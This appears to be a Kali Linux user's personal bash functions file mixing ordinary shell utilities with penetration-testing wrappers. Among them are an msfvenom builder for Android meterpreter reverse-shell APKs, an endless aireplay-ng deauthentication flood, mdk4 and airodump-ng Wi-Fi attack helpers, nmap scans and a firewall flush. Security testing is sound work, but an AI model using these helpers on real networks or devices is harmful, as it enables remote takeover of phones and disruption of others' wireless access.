#!/usr/bin/env bash

# Create a new directory and enter it
function mkd() {
  mkdir -p "$@" && cd "$_" && ls -lhAF --color=always;
}

# `tre` is a shorthand for `tree` with hidden files and color enabled
function tre() {
  tree -aC -I '.git|node_modules|bower_components' --dirsfirst "$@" | less -FRNX;
}

function clr() {
  clear && figlet rykn0wxx -c -t
}

# # exx - archive extractor
# # usage: exx <file>
function exx () {
  if [ -f $1 ] ; then
    case $1 in
      *.tar.bz2)   tar xjf $1   ;;
      *.tar.gz)    tar xzf $1   ;;
      *.bz2)       bunzip2 $1   ;;
      *.rar)       unrar x $1     ;;
      *.gz)        gunzip $1    ;;
      *.tar)       tar xf $1    ;;
      *.tbz2)      tar xjf $1   ;;
      *.tgz)       tar xzf $1   ;;
      *.zip)       unzip $1     ;;
      *.Z)         uncompress $1;;
      *.7z)        7z x $1      ;;
      *)           echo "'$1' cannot be extracted via ex()" ;;
    esac
  else
    echo "'$1' is not a valid file"
  fi
}

function mm () {
  if [ -f $1 ] ; then
    case $1 in
      n)  sudo nmap -sn 192.168.254.0/24 ;;
      s)  sudo nmap -sS 192.168.254.0/24 ;;
    esac
  fi
}

function reset_iptables () {
  iptables -P INPUT ACCEPT
  iptables -P OUTPUT ACCEPT
  iptables -P FORWARD ACCEPT
  sleep 1s
  iptables -F INPUT
  iptables -F OUTPUT
  iptables -F FORWARD
  sleep 1s
  iptables -F
  echo "done"
}

function vscode () {
  vargs="--user-data-dir='/home/rykn0wxx'"
  if [[ -z $@ ]] ; then
    code sample.txt --user-data-dir --no-sandbox
  else
    code $1 --user-data-dir --no-sandbox
  fi
}

function to-mon () {
  if [[ ! ($# -eq 0) ]] ; then
    ip link set "${1}" down >/dev/null 2>&1
    if [[ "${2}" = "mon" ]] ; then
      iw "${1}" set monitor control >/dev/null 2>&1
    else
      iw "${1}" set type managed >/dev/null 2>&1
    fi
  fi
  error=$?
  ip link set "${1}" up >/dev/null 2>&1
  if [ "${error}" != 0 ]; then
    return 1
  fi
  return 0
}

function apk() {
  if [[ ($# -eq 4) ]] ; then
    case "$1" in
      tcp) msf_payload="android/meterpreter/reverse_tcp" ;;
      http) msf_payload="android/meterpreter/reverse_http" ;;
      https) msf_payload="android/meterpreter/reverse_https" ;;
    esac
    if [[ ! `(ipcalc -c "$2" | grep -i invalid)` ]]; then
      msf_lhost="LHOST=${2}"
    fi
    if [[ "$3" =~ ^[0-9]+$ && $3 -ge 1 && $3 -le 65536 ]]; then
      msf_lport="LPORT=${3}"
    fi
    msfvenom --payload $msf_payload $msf_lhost $msf_lport --smallest --arch dalvik --platform android --format raw --out "${4}"
  fi
}

function unspace() {
  if [[ -f $1 ]] ; then
    sed -i '/^\s*$/d' $1
  fi
}

function 4ever() {
  find / -iname "*${1}*"
}

function add-to-gpg() {
  if [ -f $1 ]; then
    fname=$(echo $1 | rev | cut -d . -f 2 | rev | cut -d _ -f 1)
    ispub=$(file $1 | grep "PGP public key block Public-Key (old)")
    if [[ $ispub ]]; then
      fkeyring="${fname}_keyring.gpg"
      fout="${fname}.gpg"
      gpg --no-default-keyring --keyring ./$fkeyring --import $1
      gpg --no-default-keyring --keyring ./$fkeyring --export > ./$fout
      mv ./$fout /etc/apt/trusted.gpg.d/
      rm -rf $fkeyring
      echo "added"
    fi
  fi
}

function deauth-me() {
  aireplay-ng --deauth 0 -a $1 --ignore-negative-one $2
}

function m4kd() {
  mdk4 $2 m -t $1 -j
}

function air-dump() {
  airodump-ng --manufacturer --showack wlan0
}

# Hash or UnHash sources list
function re_hash() {
  hash_result=""
  for f in /etc/apt/sources.list.d/*; do
    if [[ "$f" != "/etc/apt/sources.list.d/kali.list" ]]; then
      hash_chk=$(grep -E "# deb" $f)
      if [[ $hash_chk ]]; then
        sed -i 's/# deb \[/deb \[/' $f
        hash_result="removed hash"
      else
        sed -i 's/^/# /' $f
        hash_result="added hash"
      fi
    fi
  done
  echo $hash_result
}

# Lookup Vendor via MAC Address
function oui_find() {
  if [ $# -eq 0 ]; then
    echo "usage: oui_find [device mac address]"
  else
    dev_mac="$(echo $1 | sed 's/ //g' | sed 's/-//g' | sed 's/://g' | cut -c1-6)"
    mac_result="$(grep -i -A 4 ^$dev_mac /var/lib/ieee-data/oui.txt)"
    if [ "$mac_result" ]; then
      echo "For the MAC $1 the following information is found:"
      echo "$mac_result"
    else
      echo "MAC $1 is not found in the database."
    fi
  fi
}
